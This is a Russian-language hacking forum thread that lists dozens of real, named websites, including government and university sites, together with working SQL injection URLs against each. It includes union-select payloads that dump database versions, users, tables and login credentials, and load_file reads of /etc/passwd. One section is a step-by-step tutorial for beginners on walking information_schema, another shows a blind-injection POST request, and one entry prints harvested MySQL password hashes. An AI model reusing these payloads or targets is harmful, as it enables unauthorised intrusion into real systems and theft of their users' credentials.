http://www.feltbikes.de 5.0.32-Debian_7etch6:root@localhost:felt_artikel http://www.feltbikes.de/cross.php?id=-4+union+select+1,2,3,4,load_file(0x2f7661722f7777772f66656c742f6c6962726172792e706870),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* ------------------------------------------------------------------------ http://www.furisto.de 5.0.32- Debian_7etch5:sk0223 2@localhost:usr_sk02 232_1 http://www.furisto.de/component/option,com_ownbiblio/index.php?option=com_ownbiblio&view=catalogue&year=All&catid=1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users+limit+1,100/*------------------------------------------------------------------------ http://digital.tomsk.ru 4.0.27-log:digitalwww@localhost http://digital.tomsk.ru/?IDcatalog=975155&ItemID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* ------------------------------------------------------------------------ http://www.diac.ru http://www.diac.ru/news/comments.php?news_id=-1+union+select+1,2,3,4,5,6,7,8/* ------------------------------------------------------------------------ http://calendar.hpu.edu Самое вкусное)) - еду! http://calendar.hpu.edu/event_details.php?event_id=-2555+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/* 5.0.26-standard:root@localhost:calendar Подбираем таблицы и колонки! Еще доступна читалка load_file() load_file(0x2f6574632f706173737764) - /etc/passwd load_file(0x2f6574632f706173737764) - function.php /data0/httpd/calendar/htdocs - Дира! http://calendar.hpu.edu/admin/ - Админка! + Можно перебирать колонки и таблицы! =) ------------------------------------------------------------------------ http://www.roguegovernment.com 4.1.22-standard:roguegov_publicr@localhost:roguegov_rgov http://www.roguegovernment.com/news.php?id=-4682+union+select+1,2,3,4,5,6/* ------------------------------------------------------------------------ http://www.paristoutcourt.org 5.0.45-Debian_1ubuntu3.3-log[email protected]aristoutcourtor Есть таблица: ptc_users Поля в таблице: user_login,user_pass,user_email http://www.paristoutcourt.org/blogs/blog.php?id=7&blog=-1+union+select+1,2,concat_ws(char(58),user_login,user_pass,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+ptc_users/* Дальше через limit ------------------------------------------------------------------------ http://www.viaggiavventurenelmondo.it 5.0.45-Debian_1ubuntu3.3-log:[email protected]:cdocanm Таблица: user Колонки: login,password http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=1+union+select+1,concat(login,char(58),password),3,4,5,6,7,8,9+from+user/* Дальше через limit ------------------------------------------------------------------------ http://www.kvartira-omsk.ru 5.0.27-standard-log:vashakvartira@localhost:vashakvartira 5ая версия - можно искать таблицы! ------------------------------------------------------------------------ http://www.easybackline.fr 4.1.11-Debian_4sarge7:[email protected]:easybkline С этим сайтом работае через unhex(hex(...)) ------------------------------------------------------------------------ http://www.cliocup.fr 5.0.44-log:root@localhost:wsr 5ая версия! Можно перебирать... Так же есть читалка через load_file() load_file(0x2f6574632f706173737764) - /etc/passwd ------------------------------------------------------------------------
Пора делать ставки на лошадей *). Казино там итд. В общем таблицы не подобрал буду рад если кто нить подберёт. http://www.gohorsebetting.com/horseracing/news.php?id=1666+union+select+1,version(),user(),database()/* Version:4.1.20 Database: allhorse user: dbconnect@localhost Индийцы отжигают *) http://www.superbindia.com/audios/player.php?id=-1426/**/union/**/select/**/1,version(),user(),database(),5,6,7-- Database Version: 5.0.51a-community Database name: nirup_superbindia User name: nirup_arupreddy@localhost
http://www.buywithconfidence.gov.uk/tradeCategory.php?id=-158+union+select+1,version(),3,4,5/* 4.1.22-standard
http://www.warrenpointharbour.co.uk/service_details.php?category_id=1+order+by+15 - воть!!! Что-то переадресация с union select не АЙС!! Тама сами крутите если получится, напишу!!
Воть еще тоже с переадресацией http://www.polymercentre.ru/show.php?id=180'+order+by+1&PHPSESSID=3e29a48f71b14b1eae4ce3161e65ac50
Воть крутанул : http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4 Версия: 5.0.45 Воть для новичков разжую: http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4 - Так узнаем версию Поскольку версия 5+ то в ней присутсвует - information_schema .... начинаем копаться в ней!!! http://vklybe.ru/index.php?o=g&id=-167+union+select+table_name,2,3,4+from+information_schema.tables+limit+17,1 и так меняем до +limit+87,1 тама смарите, что вам нужно! Каким же способом посмареть дапустим таблицу modx_web_users - это limit+85,1 ?? Да очень просто!!! Идем на сайт http://k0x.ru/encoder/index.php ! И в поле Text* пишем modx_web_users и жмем Send! После тама появятся поля, нам нужно самое первое, тобишь HEX тама будет вот такое 0x6d6f64785f7765625f7573657273 ! Это Sql HEX ! Вообще можно просто перевести слово через любую вашу прогу(сайт) и просто добавляем 0x ! Вот такой запрос нужно сделать после того как мы узнали Hex код таблицы modx_web_users : http://vklybe.ru/index.php?o=g&id=-167+union+select+column_name,2,3,4+from+information_schema.columns+where+table_name=0x6d6f64785f7765625f7573657273+limit+1,1 Ну вот мы нашли всеми долгожданный username и password ! всё также просматривается через limit+1,1 , limit+2,1 и т.д. Ну потом смотрим юзернаймы и пассы!!!
4.1.20 Code: http://www.communityaction.us/index.php?id=-392+union+select+version()/* 5.0.67-log(Windows) Code: http://inuitcircumpolar.indelta.ca/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x40,table_schema,table_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+information_schema.tables+limit+17,1--&Lang=En 5.0.45-log Code: http://www.cpod.org.au/feed.php?id=6+and+1=0+union+select+1,2,3,version(),table_schema,6,table_name,8+from+information_schema.tables+limit+109,1/*
http://www.choice s.edu/resources/detail.php?id=-26+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 4.1.14-log http://www.fis k.edu/page.asp?id=158+and+1=-1+union+select+1,@@version-- Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: ) http://www.cese.utulsa.edu/content.jsp?id=-17+union+select+1,database(),3--
Крутить данную бестолку, т.к. ничего интересного этот запрос не представляет. Есть более удобный файл с ПОСТ запросом. Времяни на это у меня нет, но скажу по секрету, что версия Мускула там 5ая, а это значит есть information_schema. Для работы лучше используй тулзу на PHP из этой темы https://forum.antichat.ru/thread19844.html (нижний пост). POST http://ТОТСАЙТ.ru/mob_search.html HTTP/1.0 Host: ТОТСАЙТ.ru filter[mod_name]=mob_search&filter[name]=Fabre%'+AND+SUBSTRING((SELECT+version()+FROM+ragnadb.mob_db+LIMIT+0,1),1,1)=5# Вот о чем я примерно.
version: 5.0.41-community user: gkcomua_global@localhost database: gkcomua_global Таблицы: Code: COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS articles autors autors_info comments session activities cities config countries currencies formoflaw pictures purchase sale phpbb_auth_access phpbb_banlist phpbb_categories phpbb_config phpbb_confirm phpbb_disallow phpbb_forum_prune phpbb_forums phpbb_groups phpbb_posts phpbb_posts_text phpbb_privmsgs phpbb_privmsgs_text phpbb_ranks phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_sessions_keys phpbb_smilies phpbb_themes phpbb_themes_name phpbb_topics phpbb_topics_watch phpbb_user_group phpbb_users phpbb_vote_desc phpbb_vote_results phpbb_vote_voters phpbb_words baza dop_inf doska fen_category Обратите внимание на это форум => группы => просмотреть информацию ссылка: http://www.audit.kharkov.com/forum1/groupcp.php?g=22&sid=ae20327f81b80ed5fd34b4bbc37154a8 version: 4.1.22-log user: diotrav2_dio@localhost database: diotrav2_dio
http://cdbara n.com/detail.php?id=-241+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables-- version 5
http://teknews.net/details.php?id=-41839+union+select+1,2,version(),database(),5,user(),7,8,9-- Version: 5.0.51a-3ubuntu5.4 user: teknews@localhost database: teknews http://www.online-publishers.org/newsletter.php?newsId=164+union+select+1,2,version(),user(),5,6,7,8,9,database(),11,12,13,14,15,16,17,18,19,20,21,22,23/* version: 4.1.20 user: opaadmin@localhost database: OPA http://www.nepaltravelnews.com/news.php?nid=207+union+select+1,2,3,version(),user(),database(),7,8,9,10,11,12,13,14--&&page=nid version: 5.0.51a-community user: travel_ntn@localhost database: travel_travel http://www.insanely-great.com/news.php?id=-9905+union+select+1,2,user(),version(),5,6,database(),8,9,10,11,12,13,14,15,16,17,18/* version: 4.1.21-log user: [email protected] database: flamini_igm
Слу пожалуйста покрути её немного! Я блин тама в этом скульном скрипте все заполнил, вроде прально а он мне пишет: Невозможно провести sql инъекцию, возможно: 1. Данные введены не правильно 2. Передача данных выбранным методом невозможна для данного сайта Плиизззз покрути ето! МНЕ ОЧЕНЬ НУЖНО!!!!
http://www.gryphon.org.au/gallery/pictures/showPicture.php?album=-1+union+select+1,concat_ws(0x3a,version(),user(),database())-- 5.0.67:gryphon@localhost:gryphon http://www.gryphon.org.au/gallery/pictures/showPicture.php?album=-1+union+select+1,concat_ws(0x3a,user,password)+from+mysql.user-- PHP: root:*A0BA0CCDEF2E7FAEF16510E7F845108919D1D778 phpmyadmin:*45988B8EBD97ABF91FE3ADFEFA92BE3FBA859CA0 debian-sys-maint:5628c5d468086ccb mysql:652f9c175d1914f9 gryphon:2314d08b327c439a xrms:420fe7a60860988c nuke:7947670723f0a05b primequalitymeat:3d6a72ce055ea240 anta:2210636e65fe3992 bytesys:0e091d0759fdd203 autism:0a53f5a70675ac01 backup:*A11C33EBF4C6044E919113E6BC70408DA6A665CE zubah:2e77180b427b3418 carl:*CEEBD0B5C31056DC20AB5E97EC94EE8F5AB70C12 sugarcrm:110832a12c60f2c7 sugarcrm:*2444EE85885C0FA09B328E49FDD203B0E508BE38 ajexa:7726ea7663fab356 ajexa:*CB1645B337E2753340EA7B99D6F88509B55D03DE .... etc http://www.vibb.at/gallery/showpicture.php?id=-1+union+select+1,2,3,4,5+from+users/* no printable http://www.soostheglobe.nl/albums/showpicture.php?albumid=61&photo=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3-- 4.1.20-logays@localhost:soos http://www.bertemu.us/showpicture.php?pic=21241+union+select+1,concat_ws(0x3a,version(),user(),database())/* 4.1.22-standard:bertemu_remko@localhost:bertemu_bertemu http://rybalka.zooclub.ru/article.php?id=999999+union+select+1,concat_ws(0x3a,user(),database(),version()),3-- user():zooclub_zooclub@localhost database():zooclub_rybalka version():5.0.67-community-log http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10/* user()ollan_article@localhost database()ollan_articles version():4.1.22-standard http://www.tnufacenter.com/rus/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,us er(),database(),version()),5/* user()fer@localhost database():tnufacenter version():5.0.22-community-nt http://www.energovent.com/ru/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version())/* user():[email protected] database():db_dolbik_5 version():4.1.22-log http://ve.free-travels.ru/books/item.php?id=9999999+union+select+1,2,3,4,5,6,7,8,9,10 ,11,concat_ws(0x3a,user(),database(),version()),13,14,15/* user():[email protected] database():gb_x_free_9e1 version():5.0.45-community-nt-log http://sistem.by/main.php?catid=-1+union+select+concat_ws(0x3a,user(),database(),vers ion())/* user():sysby@localhost database():sysby vaersion():5.0.41 http://www.sokol-mebel.ru/dressers/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws( 0x3a,user(),database(),version()),8,9-- user():[email protected] database():u97809 version():5.0.67-log http://www.garo.cc/text.php?pageid=999999+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9-- user():[email protected] database():u7114 version():5.0.67-log http://www.zvi.ru/item.php?id=999999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31-- user():szvi@localhost database():shop2 version():5.0.26
www.azffc.org PR=5 Code: http://www.azffc.org/show_page.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,22-- Version() - 5.0.45-log Таблицы: Code: COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS articles attachments cases config content homepage images images_pages ips lawyers news pages questions random_image registrations trivia crnc.org PR=6 Code: http://www.crnc.org/viewnews.php?id=-1+union+select+1,version(),user(),4,5,6,7-- Version() - 5.0.51a-log Таблицы: Code: COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS activity admin articles images members page_contents states
